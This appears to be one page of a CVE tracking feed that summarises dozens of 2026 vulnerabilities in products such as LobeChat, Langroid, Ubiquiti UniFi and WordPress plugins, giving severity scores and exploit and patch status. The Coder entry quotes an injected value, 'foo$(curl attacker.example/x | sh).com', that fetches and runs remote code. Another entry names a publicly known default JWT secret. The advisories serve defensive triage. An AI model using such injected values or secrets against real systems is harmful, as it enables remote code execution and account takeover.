Skip to main content
CVE-2026-59099 CRITICAL POC PATCH Act Now

Plaintext recovery of webflow conversation state in Apereo CAS (versions 7.3.0 up to but not including 8.0.0-RC6) lets remote unauthenticated attackers decrypt sensitive login-flow data by exploiting AES-GCM nonce reuse. Because the server encrypts client-side webflow execution tokens with a fixed all-zero initialization vector under a single long-lived key, an attacker can harvest multiple tokens from the public login page and apply known-plaintext/keystream-reuse analysis to break confidentiality (and, given GCM's nonce-reuse properties, integrity of the token). Publicly available exploit code exists; the flaw was reported by VulnCheck and carries a CVSS 4.0 base of 9.3, though no CISA KEV listing or EPSS score is provided.

Information Disclosure Cas
NVD GitHub VulDB
CVSS 4.0
9.3
EPSS
0.4%
CVE-2026-50180 HIGH POC PATCH GHSA This Week

Arbitrary file read in Langroid's SQLChatAgent (<= 0.63.0) lets an attacker who can influence the LLM-generated SQL exfiltrate files from the PostgreSQL host even under the strict default config (allow_dangerous_operations=False, allowed_statement_types=['SELECT']). The _validate_query blocklist enumerates dangerous functions by exact name and misses the pg_read_file/pg_stat_file/pg_ls_*/pg_current_logfile family (plus MSSQL OPENDATASOURCE and keyword-less SQLite ATTACH), so these SELECT-shaped payloads pass both the statement-type allowlist and the regex blocklist and reach the live SQLAlchemy engine. Publicly available exploit code exists (a working PoC ships in the GHSA advisory); no public exploit identified as actively exploited and this is not in CISA KEV.

PostgreSQL Python Path Traversal Canonical Docker
NVD GitHub
CVSS 4.0
8.7
EPSS
0.7%
CVE-2026-59094 HIGH POC PATCH This Week

Denial of service in Pathway data-processing framework (versions through 0.31.1) lets a remote unauthenticated attacker exhaust CPU by submitting a short glob pattern packed with many ** tokens to the document store's /v1/retrieve, /v1/inputs and /v2/answer endpoints. The hand-written recursive matcher branches exponentially on each ** without memoization, so a handful of crafted requests can stall the service for tens of seconds each and deny availability. Publicly available exploit code exists and a vendor patch (commit d09722e) is available; the flaw is not listed in CISA KEV.

Information Disclosure Pathway
NVD GitHub
CVSS 4.0
8.7
EPSS
0.5%
CVE-2026-59095 HIGH POC PATCH This Week

Server-side request forgery in LobeChat before 2.2.10-canary.18 lets authenticated users coerce the server into issuing internal HTTP requests to attacker-chosen URLs, enabling disclosure of internal service responses and cloud credentials from instance metadata endpoints. The flaw stems from two endpoints - skill import (importFromUrl) and topic cover update (fetchImageFromUrl) - calling the global fetch instead of the project's ssrf-safe-fetch wrapper. Publicly available exploit code exists and a vendor patch has shipped, though it is not listed in CISA KEV.

SSRF Lobehub
NVD GitHub
CVSS 4.0
8.3
EPSS
0.2%
CVE-2026-58467 HIGH POC PATCH This Week

Arbitrary file disclosure and PHP local file inclusion in Cockpit CMS before release 364 lets unauthenticated remote attackers read files outside the web root and, on certain server setups, cause the application to include() attacker-chosen .php files. The flaw stems from unvalidated PATH_INFO (derived from REQUEST_URI) being used to build filesystem paths without containment checks. Publicly available exploit code exists; it is not listed in CISA KEV and no EPSS score was provided.

Path Traversal Nginx PHP Cockpit
NVD GitHub
CVSS 4.0
8.2
EPSS
0.4%
CVE-2026-58578 HIGH POC PATCH This Week

Denial of service in LobeChat before 2.2.10-canary.15 lets an authenticated user hang the entire Node.js server by importing a GitHub-hosted skill whose repository URL path contains a catastrophic-backtracking regex pattern. Because the malicious basePath is compiled into a dynamic regular expression in findSkillMd and matched synchronously against archive entries, a single request blocks the shared event loop for tens of seconds, denying service to all concurrent users. Publicly available exploit code exists and a vendor patch is available, though there is no public exploit identified as being used in active exploitation.

Node.js Denial Of Service Lobehub
NVD GitHub
CVSS 4.0
7.1
EPSS
0.3%
CVE-2026-59098 HIGH POC PATCH This Week

Cross-user data disclosure in LobeChat through version 2.2.9 allows any authenticated user to read other users' documents by abusing the retrieval-augmented-generation (RAG) semantic search, whose chunk model omits a user-identifier predicate. By supplying arbitrary victim file or knowledge-base identifiers through the chunk retrieval and chat knowledge-base paths, an attacker recovers text content, file names, and metadata belonging to other tenants. Publicly available exploit code exists and a vendor patch has been released; the flaw is not listed in CISA KEV and no active exploitation is reported.

Authentication Bypass Lobehub
NVD GitHub VulDB
CVSS 4.0
7.1
EPSS
0.2%
CVE-2026-50181 HIGH POC PATCH GHSA This Week

Path traversal in Langroid's ReadFileTool and WriteFileTool lets a tool caller escape the configured curr_dir workspace boundary by supplying '../' sequences in file_path, because the tools only chdir into curr_dir without resolving and enforcing that the final path stays inside it. Applications that expose these file tools to an LLM agent or user-influenced tool calls can have arbitrary files read or written outside the intended project/sandbox directory, exposing secrets, config, and source files or corrupting files elsewhere on the host. Publicly available exploit code exists (a working PoC is included in the report demonstrating both read and write escapes), but there is no public exploit identified as being used in active attacks and it is not listed in CISA KEV.

Python Path Traversal Docker
NVD GitHub
CVSS 3.1
7.1
EPSS
0.2%
CVE-2026-58460 HIGH POC This Week

Arbitrary file overwrite in the react-native-receive-sharing-intent library (ajith-ab) lets a co-resident malicious Android app write attacker-controlled content outside the intended cache directory into the consuming app's private data. The flaw stems from trusting a ContentProvider-supplied _display_name containing dot-dot sequences, enabling overwrite of databases, shared preferences, and cached config. Publicly available exploit code exists (reported by VulnCheck); no active exploitation has been reported in CISA KEV.

Path Traversal React Native Receive Sharing Intent
NVD GitHub VulDB
CVSS 4.0
7.0
EPSS
0.1%
CVE-2026-59097 MEDIUM POC PATCH This Month

Unauthenticated remote attackers can create default due-date records in any Taiga project by exploiting missing authorization on POST endpoints across the user-story, task, and issue due-date API viewsets in taiga-back before 6.10.2. The endpoints default to the AllowAny permission class (CWE-862), entirely bypassing project-level access controls and accepting arbitrary project identifiers in request bodies. No active exploitation is confirmed in CISA KEV, but a publicly available exploit exists, and the attack requires zero authentication, making exploitation trivially automatable against any network-exposed Taiga instance.

Authentication Bypass Taiga Back
NVD GitHub
CVSS 4.0
6.9
EPSS
0.3%
CVE-2026-50746 CRITICAL PATCH NEWS Act Now

Improper access control in Ubiquiti's UniFi Connect Application allows a network-adjacent attacker to bypass authentication and inject arbitrary operating-system commands on the underlying host, yielding full compromise (CVSS 10.0). The flaw chains an access-control weakness (CWE-284) with command injection, so an unauthenticated attacker reachable on the network can execute code with the application's privileges and pivot beyond the app boundary (scope change). No public exploit has been identified at time of analysis, and the issue is not listed in CISA KEV; EPSS data was not provided.

Authentication Bypass Ubiquiti Command Injection Unifi Connect Application
NVD
CVSS 3.1
10.0
EPSS
0.8%
CVE-2026-50748 CRITICAL PATCH Act Now

Command injection in Ubiquiti's UniFi Access Application lets a low-privileged attacker with network reach run arbitrary OS commands on the underlying host device, escaping the application into the operating system (CVSS 9.9, scope-changed). Improper input validation (CWE-20) means attacker-supplied data reaches a shell context; there is no public exploit identified at time of analysis, and the flaw is not listed in CISA KEV. Reported through HackerOne and addressed in Ubiquiti Security Advisory Bulletin 066.

Command Injection Ubiquiti Unifi Access Application
NVD
CVSS 3.1
9.9
EPSS
0.8%
CVE-2026-56004 CRITICAL PATCH Act Now

OS command injection in the mercurial (hg) handler of openSUSE's obs-service-tar_scm source service before 0.12.4 lets an attacker who can supply a _service file inject options and shell metacharacters through the 'revision' field, achieving arbitrary code execution as the source service or as a local user checking out the service. The CVSS 3.1 base score is 10.0 (scope-changed, network vector), reflecting that malicious input is processed by the build service. No public exploit has been identified at time of analysis, though the upstream fix (openSUSE/obs-service-tar_scm PR #552) publicly discloses the vulnerable code path.

Command Injection Buildservice
NVD GitHub
CVSS 3.1
10.0
EPSS
0.4%
CVE-2026-57624 CRITICAL Act Now

Unauthenticated remote code execution affects Creative Themes' Blocksy Companion Pro WordPress plugin in all versions up to and including 2.1.46, allowing remote attackers to inject and execute arbitrary code (CWE-94) without any authentication or user interaction. Rated CVSS 10.0 with a scope-changed vector, this is a maximum-severity flaw reported by Patchstack. No public exploit identified at time of analysis and it is not currently listed in CISA KEV, but the trivial exploitability of an unauthenticated RCE makes it a high-priority patching target.

Code Injection RCE Blocksy Companion Pro
NVD VulDB
CVSS 3.1
10.0
EPSS
0.7%
CVE-2026-50747 CRITICAL PATCH Act Now

Privilege escalation in Ubiquiti's UniFi Talk Application allows an authenticated attacker holding a low-privileged account to chain multiple SQL injection flaws (CWE-89) and gain elevated control over the underlying host device. The issue carries a critical 9.9 CVSS score driven by network reachability, low attack complexity, and a scope change from the application into the host OS. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the low bar of only needing minimal authenticated access makes this a high-priority patch for exposed UniFi Talk deployments.

Ubiquiti SQLi Unifi Talk Application
NVD
CVSS 3.1
9.9
EPSS
0.2%
CVE-2026-55115 CRITICAL PATCH Act Now

Privilege escalation via Server-Side Request Forgery in Ubiquiti's UniFi Protect Application allows a low-privileged, network-adjacent attacker to coerce the application into making attacker-controlled requests and escalate to control of the host device. The CVSS 9.9 rating is driven by a scope change (S:C) plus full confidentiality, integrity, and availability impact, meaning the SSRF crosses a security boundary from the application into the underlying host. No public exploit identified at time of analysis, and the flaw is not listed in CISA KEV; EPSS data was not provided.

SSRF Ubiquiti Unifi Protect Application
NVD
CVSS 3.1
9.9
EPSS
0.2%
CVE-2026-54998 HIGH PATCH NEWS NO ACTION HOSTED Monitor

Privilege escalation in Microsoft Exchange Online allows an already-authenticated attacker to elevate their permissions over the network by exploiting an incorrect authorization check (CWE-863). Because Exchange Online is a cloud-hosted, multi-tenant service, a low-privileged authenticated user could gain elevated access to confidential data, tamper with mail/configuration, and disrupt availability. No public exploit has been identified at time of analysis, and the EPSS/exploit-maturity signal (E:U) indicates exploit code is currently unproven.

Authentication Bypass Microsoft Microsoft Exchange Online
NVD VulDB
CVSS 3.1
8.8
EPSS
0.6%
CVE-2026-57100 HIGH PATCH NEWS NO ACTION HOSTED Monitor

Privilege escalation via server-side request forgery affects the Microsoft Entra Provisioning Service (SyncFabric), where an authenticated attacker with low privileges can coerce the service into making attacker-controlled network requests to reach internal endpoints and elevate privileges across the identity provisioning fabric. Microsoft has released a fix through MSRC; there is no public exploit identified at time of analysis, and SSVC rates exploitation as none with an EPSS of 0.64%. The high CVSS of 8.8 is driven by total technical impact (C:H/I:H/A:H) against a cloud identity control plane.

SSRF Microsoft Microsoft Entra Provisioning Service
NVD VulDB
CVSS 3.1
8.8
EPSS
0.6%
CVE-2026-45499 HIGH PATCH NEWS NO ACTION HOSTED Monitor

Privilege elevation in Microsoft's Azure OpenAI service allows an authorized (low-privileged) attacker to abuse a server-side request forgery flaw (CWE-918) to force the service backend to issue attacker-controlled network requests, resulting in high confidentiality, integrity, and availability impact. The flaw carries CVSS 8.8 and requires only low privileges over the network with no user interaction, but currently shows no public exploit identified at time of analysis and a modest EPSS of 0.62%. Because Azure OpenAI is a Microsoft-hosted cloud service, remediation is delivered server-side by the vendor rather than requiring customer patching.

SSRF Microsoft Azure Open Ai
NVD VulDB
CVSS 3.1
8.8
EPSS
0.6%
CVE-2026-27419 CRITICAL Act Now

Arbitrary file upload in the Zegen WordPress theme (versions 1.1.9 and earlier) lets a low-privileged authenticated user (Subscriber role) upload files without adequate type validation, enabling upload of executable PHP and full site compromise. The CVSS 3.1 base score is 9.9 with a scope change, reflecting that a minimally-privileged account can escalate to server-level code execution. Reported by Patchstack; no public exploit identified at time of analysis and it is not listed in CISA KEV.

File Upload Zegen
NVD
CVSS 3.1
9.9
EPSS
0.4%
CVE-2026-54408 CRITICAL PATCH Act Now

Authentication bypass in Ubiquiti's UniFi Protect Application (versions before 7.1.83) allows a network-adjacent attacker to access data streaming without valid credentials due to improper access control. An unauthenticated attacker on a reachable network can view video/data streams that should be protected, with SSVC flagging the flaw as automatable. No public exploit has been identified at time of analysis, and the EPSS probability is low (0.27%), but the CVSS 9.8 rating and network exposure make it a meaningful patch priority.

Authentication Bypass Ubiquiti Unifi Protect Application
NVD
CVSS 3.1
9.8
EPSS
0.3%
CVE-2026-55116 CRITICAL PATCH Act Now

Unauthorized configuration changes on Ubiquiti UniFi OS gateway devices (Dream Machines, Dream Routers, Cloud Gateways, Enterprise Firewall Core, Enterprise Fortress Gateway, Dream Wall and Express 7) are possible through an improper access control flaw that, under certain network configurations, lets a network-adjacent attacker alter device settings without proper authorization. Ubiquiti has released version 5.1.19 to fix the issue via Security Advisory Bulletin 066. There is no public exploit identified at time of analysis, EPSS probability is low (0.22%), and CISA SSVC records exploitation status as none, but the total technical impact and 9.8 CVSS rating make this a high-priority patch for exposed gateways.

Authentication Bypass Ubiquiti Dream Machines Enterprise Fortress Gateway Dream Wall +4
NVD
CVSS 3.1
9.8
EPSS
0.2%
CVE-2026-38968 CRITICAL NEWS Act Now

Session hijacking in ntopng versions through 6.6 arises because HTTP session identifiers are generated with weak, time-seeded pseudo-randomness in src/HTTPserver.cpp, making freshly issued authenticated session cookies predictable or collision-prone. Remote attackers who can influence or observe login timing can forecast a valid session token and take over an authenticated user's session without credentials. No public exploit identified at time of analysis, and EPSS is low (0.15%, 5th percentile) despite the 9.8 CVSS rating.

Information Disclosure N A
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.2%
CVE-2026-49352 CRITICAL PATCH GHSA Act Now

Authentication bypass in 9router (>= 0.2.21 through 0.4.41) lets any unauthenticated remote attacker forge a valid dashboard session cookie because the JWT signing key falls back to the publicly committed hardcoded string "9router-default-secret-change-me" whenever the JWT_SECRET environment variable is unset. Since this secret is identical across every release and visible in the public repository, an attacker can pre-compute a valid auth_token, bypass the /dashboard login, and reach every API endpoint to steal stored API keys and auth tokens or take over the instance. Publicly available exploit code exists (the advisory ships a working jose-based PoC); there is no CISA KEV listing and no confirmed active exploitation at time of analysis.

Authentication Bypass OpenSSL
NVD GitHub
CVSS 3.1
9.8
CVE-2026-54617 CRITICAL GHSA Act Now

Arbitrary file read in GravitLauncher LaunchServer ≤ 5.7.11 lets an unauthenticated remote attacker retrieve any file readable by the server process via a path-traversal in the default-enabled HTTP file server on port 9274. Because the exposed files include the ECDSA key that signs access JWTs (.keys/ecdsa_id), the refresh-token salt, and database credentials, the flaw escalates from information disclosure to a full authentication bypass allowing forged admin tokens. Publicly available exploit code exists (a raw-socket PoC in the advisory); the issue is not listed in CISA KEV and no active exploitation is confirmed.

Path Traversal Authentication Bypass Nginx Java Information Disclosure
NVD GitHub
CVSS 3.1
9.8
CVE-2026-50027 CRITICAL POC PATCH GHSA Act Now

Missing authentication in mcp-memory-service's HTTP REST server exposes every route under /api/documents/* without any credential check, even when the operator has enabled MCP_API_KEY or OAuth, so remote attackers can upload, read, and delete stored memories at will. Because the sibling /api/memories router correctly enforces auth (returning 401), the gap is an inconsistent, easily-discovered authentication boundary that grants full confidentiality, integrity, and availability impact. A working PoC and vendor GitHub Security Advisory (GHSA-84hp-mqvj-3p8h) exist, so publicly available exploit code exists, though no CISA KEV listing or EPSS score was provided.

Authentication Bypass Python Information Disclosure Docker
NVD GitHub
CVSS 3.1
9.8
CVE-2026-4767 CRITICAL Act Now

Authentication abuse in TR7 Cyber Defense WAF-ASP (versions v1.0.324.900 through v1.4.0.116) lets remote unauthenticated attackers invoke a security-critical function that fails to enforce any authentication check, yielding full compromise of confidentiality, integrity, and availability per the CVSS 9.8 rating. Because WAF-ASP is a web application firewall, abusing this exposed function can subvert the very protection layer meant to shield downstream applications. No public exploit identified at time of analysis, and the flaw is not listed in CISA KEV; disclosure comes from Turkey's national CERT (TR-CERT).

Authentication Bypass Waf Asp
NVD
CVSS 3.1
9.8
EPSS
0.3%
CVE-2026-5524 CRITICAL Act Now

Arbitrary file upload leading to remote code execution in the Divi Form Builder WordPress plugin (versions through 5.1.8) lets unauthenticated attackers upload executable PHP files and run arbitrary code on the server. Attacker-controlled input from the acceptFileTypes POST parameter is interpolated directly into the file-validation regex in do_image_upload(), allowing alternate PHP extensions (.phtml, .phar, .php5, .php7) that evade the plugin's .php-only .htaccess block - and on Nginx the .htaccess protection does not apply at all. There is no public exploit identified at time of analysis and it is not in CISA KEV, but the CVSS 9.8 rating and Wordfence's technical disclosure make this a high-priority patching target.

WordPress Nginx PHP RCE File Upload +1
NVD
CVSS 3.1
9.8
EPSS
0.5%
CVE-2026-57677 CRITICAL Act Now

Unauthenticated PHP Object Injection in the Novalnet Payment Gateway for WooCommerce WordPress plugin (versions 12.10.3 and earlier) lets remote attackers submit crafted serialized objects that the plugin deserializes, per CVSS enabling full compromise of confidentiality, integrity, and availability. The flaw is network-reachable without authentication or user interaction and carries a critical 9.8 CVSS score. No public exploit has been identified at time of analysis, and it is not listed in CISA KEV.

WordPress Deserialization PHP Novalnet Payment Gateway For Woocommerce
NVD
CVSS 3.1
9.8
EPSS
0.3%
CVE-2026-57621 CRITICAL Act Now

Unauthenticated PHP Object Injection in the Booktics WordPress plugin (by Arraytics) affects all versions up to and including 1.0.21, letting remote attackers with no authentication inject arbitrary PHP objects into the application. If a suitable POP (property-oriented programming) gadget chain exists in the plugin, WordPress core, or another active plugin, this can escalate to remote code execution, data theft, or full site takeover. Reported by Patchstack and rated CVSS 9.8; no public exploit identified at time of analysis and it is not listed in CISA KEV.

Deserialization PHP Booktics
NVD
CVSS 3.1
9.8
EPSS
0.3%
CVE-2026-57625 CRITICAL Act Now

Stored/reflected cross-site scripting in the Admin and Site Enhancements (ASE) Pro WordPress plugin (versions 8.8.5 and earlier) allows unauthenticated remote attackers to inject malicious scripts that execute in a victim's browser once they view the affected page or follow a crafted link. Because the flaw requires no authentication and carries a scope-changing CVSS 3.1 score of 9.6, a single successful lure can lead to admin session hijacking and full site takeover. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

XSS Admin And Site Enhancements Ase Pro
NVD
CVSS 3.1
9.6
EPSS
0.3%
CVE-2026-52830 CRITICAL PATCH GHSA Act Now

Authentication bypass via path traversal in the fast-mcp-telegram MCP server (Python, PyPI package fast-mcp-telegram, master through release 0.19.0) lets a remote client hijack the default Telegram account without a valid bearer token. The SessionFileTokenVerifier blocks the exact reserved token 'telegram' but fails to normalize path separators, so a token like '../fast-mcp-telegram/telegram' resolves back to the default ~/.config/fast-mcp-telegram/telegram.session file and is accepted. A validation proof-of-concept is published in the advisory (publicly available exploit code exists), though there is no public exploit identified in the wild and no CISA KEV listing.

Authentication Bypass Python Path Traversal Microsoft
NVD GitHub
CVSS 3.1
9.4
EPSS
0.4%
CVE-2022-50973 CRITICAL Act Now

Yonyou KSOA 9.0 contains an unauthenticated arbitrary file upload vulnerability in the com.sksoft.bill.ImageUpload servlet that allows unauthenticated attackers to upload arbitrary files by. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

File Upload RCE
NVD
CVSS 4.0
9.3
EPSS
0.9%
CVE-2024-14037 CRITICAL HOSTED Monitor

Redsea Cloud eHR contains an arbitrary file upload vulnerability that allows unauthenticated attackers to achieve remote code execution by uploading malicious files through the PtFjk.mob servlet. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

File Upload RCE
NVD
CVSS 4.0
9.3
EPSS
0.7%
CVE-2026-58455 CRITICAL Act Now

Unauthenticated OS command injection in Notifiarr Dockwatch through version 0.6.567 lets remote attackers run arbitrary shell commands on the host and achieve full compromise, since default deployments mount the Docker socket. The root cause is an Execution-After-Redirect flaw (CWE-698) where loader.php redirects unauthenticated users but fails to call exit(), allowing the attacker to seed the required session flag and then reach shell_exec() in ajax/compose.php with attacker-controlled input. The CVSS 4.0 base score is 9.2 (VC/VI/VA all High); there is no public exploit identified at time of analysis and it is not listed in CISA KEV, though a vendor advisory and upstream fix exist.

Command Injection PHP Docker Dockwatch
NVD GitHub
CVSS 4.0
9.2
EPSS
1.2%
CVE-2026-41106 CRITICAL PATCH NEWS NO ACTION HOSTED Monitor

Privilege elevation in Microsoft 365 Copilot arises from an open redirect (CWE-601) that lets an unauthenticated remote attacker craft a Copilot-hosted URL that forwards a victim to an attacker-controlled site. Per the CVSS vector this requires the victim to interact (UI:R) with the malicious link and results in a scope change with high confidentiality and integrity impact, consistent with token/credential capture enabling elevated access. There is no public exploit identified at time of analysis (Exploit Maturity: Unproven), and it is not listed in CISA KEV; Microsoft rates it 9.3 and reports an official fix is available.

Open Redirect Microsoft 365 Copilot
NVD VulDB
CVSS 3.1
9.3
EPSS
0.5%
CVE-2026-58466 CRITICAL PATCH Act Now

Authentication bypass via hard-coded default credentials in AutoBangumi before 3.2.8 lets unauthenticated remote attackers log in as administrator using publicly known credentials that the application seeds at startup via add_default_user() whenever the users table is empty. Successful login grants full control over RSS feed and downloader configuration and every authenticated API endpoint (CVSS 4.0 9.3). No public exploit identified at time of analysis, but the credentials are public and exploitation is trivial against any un-upgraded, freshly-initialized instance.

Information Disclosure Auto Bangumi
NVD GitHub
CVSS 4.0
9.3
EPSS
0.5%
CVE-2026-13368 CRITICAL Act Now

Remote code execution in WatchGuard Fireware OS affects Fireboxes running a Mobile User VPN with IKEv2 that authenticates against an external LDAP server. A race condition in the IKEv2 LDAP authentication path can be driven into a use-after-free (CWE-416) inside the iked daemon, letting a remote unauthenticated attacker execute arbitrary code in the context of that process. No public exploit identified at time of analysis, and the CVSS 4.0 base score of 9.2 is tempered by high attack complexity and a probabilistic attack requirement (AC:H/AT:P), reflecting the difficulty of reliably winning the race.

Memory Corruption Watchguard Use After Free RCE Fireware Os
NVD VulDB
CVSS 4.0
9.2
EPSS
0.6%
CVE-2026-57683 CRITICAL Act Now

SQL injection in the WP Fast Total Search (fulltext-search) WordPress plugin by epsiloncool affects all versions up to and including 1.80.280, letting unauthenticated remote attackers inject arbitrary SQL into backend queries (CWE-89). Because the CVSS vector uses PR:N/UI:N with a scope change, exploitation needs no login or user interaction and can reach data beyond the plugin's own tables. No public exploit was identified at time of analysis; the issue was reported through Patchstack and carries a critical 9.3 base score.

SQLi Wp Fast Total Search
NVD
CVSS 3.1
9.3
EPSS
0.2%
CVE-2026-57679 CRITICAL Act Now

SQL injection in the GeekyBot WordPress plugin (versions 1.2.5 and earlier) allows unauthenticated remote attackers to inject arbitrary SQL into backend database queries per the CVSS PR:N vector. Reported by Patchstack and rated CVSS 9.3 (critical) with a scope-changed vector, the flaw enables confidentiality-impacting data extraction from the WordPress database without any authentication or user interaction. No public exploit identified at time of analysis, and the vulnerability is not listed in CISA KEV.

SQLi Geekybot
NVD
CVSS 3.1
9.3
EPSS
0.2%
CVE-2026-44454 HIGH PATCH GHSA This Week

Command injection leading to arbitrary code execution affects Coder's self-hosted developer workspace platform via the coder/registry `dotfiles` module, which interpolated the user-controlled `dotfiles_uri` into a shell script without validation. Combined with the Create Workspace page's `mode=auto` deep links, an attacker can craft a single URL that silently provisions a workspace with an attacker-supplied `dotfiles_uri` (e.g. `foo$(curl attacker.example/x | sh).com`), turning it into a one-click RCE against any authenticated user who clicks. CVSS is 8.8 (High) with EPSS at 2.28% (81st percentile); there is no public exploit identified and it is not in CISA KEV, though a proof-of-concept URL is documented in the advisory.

Command Injection RCE
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
2.3%
CVE-2026-54400 CRITICAL PATCH Act Now

Privilege escalation in Ubiquiti's UniFi Access Application allows an attacker who already holds high privileges and network reachability to break out and gain elevated control of the underlying host device. The flaw is an improper access control issue (CWE-284) tagged as an authentication bypass, carrying a CVSS 9.1 (Critical) rating driven largely by its scope-changing impact. No public exploit has been identified at time of analysis, and the issue is not listed in CISA KEV.

Authentication Bypass Ubiquiti Unifi Access Application
NVD
CVSS 3.1
9.1
EPSS
0.3%
CVE-2026-58579 MEDIUM POC PATCH This Month

Stored XSS in RAGFlow before 0.26.3 enables cross-user JavaScript execution through unsanitized agent pipeline node names rendered in a confirmation modal. An authenticated workspace member injects a payload into a DSL node name via the agent update endpoint; when a different workspace member opens the dataflow result and clicks 'Rerun from current step,' the payload executes in their browser, enabling session token theft and account takeover across the workspace trust boundary. No CISA KEV listing exists, but a public proof-of-concept is available and a vendor patch has been released as v0.26.3.

XSS Ragflow
NVD GitHub
CVSS 4.0
5.1
EPSS
0.2%
CVE-2026-38971 CRITICAL Act Now

Out-of-bounds read in ArduPilot's MAVLink ground-control-station handler (through Plane-4.6.3) lets a remote attacker on the MAVLink link send a crafted SERIAL_CONTROL message that reads memory beyond intended bounds in GCS_MAVLINK::handle_serial_control(), potentially disclosing adjacent flight-controller memory and/or crashing the autopilot. The CVSS 9.1 rating reflects high confidentiality and availability impact over an unauthenticated network vector, though EPSS is low (0.17%, 6th percentile) and no public exploit is identified at time of analysis. An upstream fix is proposed via GitHub PR #32587 (issue #32524), but no tagged patched release is independently confirmed.

Buffer Overflow Information Disclosure N A
NVD GitHub
CVSS 3.1
9.1
EPSS
0.2%
CVE-2026-27436 CRITICAL Act Now

Remote code execution in the Five Star Business Profile and Schema WordPress plugin (versions up to and including 2.3.19) allows an attacker holding an Editor-level or higher account to inject and execute arbitrary PHP code on the host. Reported by Patchstack and rated CVSS 9.1 due to its scope-changing impact, the flaw turns a trusted content role into full server compromise. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the CWE-94 code-injection root cause makes reliable exploitation straightforward for any authorized high-privilege user.

Code Injection RCE Five Star Business Profile And Schema
NVD VulDB
CVSS 3.1
9.1
EPSS
0.4%
CVE-2026-57623 CRITICAL Act Now

Unauthenticated arbitrary code execution affects the W3 Total Cache WordPress caching plugin in all versions up to and including 2.9.4, allowing remote attackers to execute code and fully compromise the underlying site without credentials or user interaction. The scope-changing CVSS 9.0 (Critical) rating reflects the plugin's deep hooks into WordPress request handling. There is no public exploit identified at time of analysis and no CISA KEV listing, though the high exploitability of a widely deployed plugin makes it a strong patching priority.

RCE W3 Total Cache
NVD
CVSS 3.1
9.0
EPSS
0.3%
CVE-2026-55726 MEDIUM PATCH CISA This Month

Unauthenticated public listing of an Azure Blob Storage container exposes device log files across the entire Gardyn smart garden fleet to any internet-accessible actor. The misconfiguration affects all versions of Gardyn Home Firmware, Gardyn Studio Firmware, and the Gardyn Cloud API, meaning no specific patched version bounds the exposure - it is architectural rather than release-specific. Reported via ICS-CERT advisory ICSA-26-183-03, no confirmed active exploitation (CISA KEV) and no public exploit code have been identified at time of analysis, though exploitation requires zero technical prerequisites beyond internet access and knowledge of the container URL.

Microsoft Information Disclosure Gardyn Home Firmware Gardyn Studio Firmware Gardyn Cloud Api
NVD GitHub
CVSS 4.0
6.9
EPSS
0.4%
CVE-2026-54402 HIGH PATCH This Week

Command injection in Ubiquiti UniFi OS (all builds before 5.1.19) lets a low-privileged user on the same network run arbitrary operating-system commands on the underlying host device, giving full control of gateways, recorders, and Cloud Keys. The flaw stems from improper input validation (CWE-20) and carries high confidentiality, integrity, and availability impact (CVSS 8.8). There is no public exploit identified at time of analysis, and CISA's SSVC framework rates exploitation as none, but the technical impact is total and a vendor patch is already available.

Command Injection Ubiquiti Unifi Os Server Dream Machines Enterprise Fortress Gateway +9
NVD VulDB
CVSS 3.1
8.8
EPSS
0.8%
CVE-2026-44941 HIGH PATCH This Week

Arbitrary root file write in libzypp before 17.38.12 lets an attacker who can get a victim to add or refresh a malicious software repository overwrite or inject files anywhere on the system as root, because the "keyhint" value in repomd.xml is parsed without rejecting path separators (CWE-23 relative path traversal). Because libzypp performs repository operations with root privileges on SUSE/openSUSE systems, this escalates directly to full host compromise. Publicly available exploit code exists (SSVC=poc); it is not listed in CISA KEV, and EPSS is low (0.49%, 38th percentile), consistent with a targeted rather than mass-exploited flaw.

Path Traversal Libzypp
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.5%
CVE-2026-56841 HIGH PATCH This Week

Privilege escalation in Ubiquiti's UniFi Protect Application is possible through an authenticated SQL injection (CWE-89) reachable by a low-privileged user with network access, letting that attacker escalate privileges on the underlying host device with full confidentiality, integrity, and availability impact. The flaw was reported through HackerOne and disclosed in Ubiquiti Security Advisory Bulletin 066; there is no public exploit identified at time of analysis and it is not listed in CISA KEV. With CVSS 8.8 (AV:N/AC:L/PR:L) it is a high-priority patch for any exposed NVR/Protect deployment.

Ubiquiti SQLi Unifi Protect Application
NVD
CVSS 3.1
8.8
EPSS
0.2%
Page 1 of 7 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy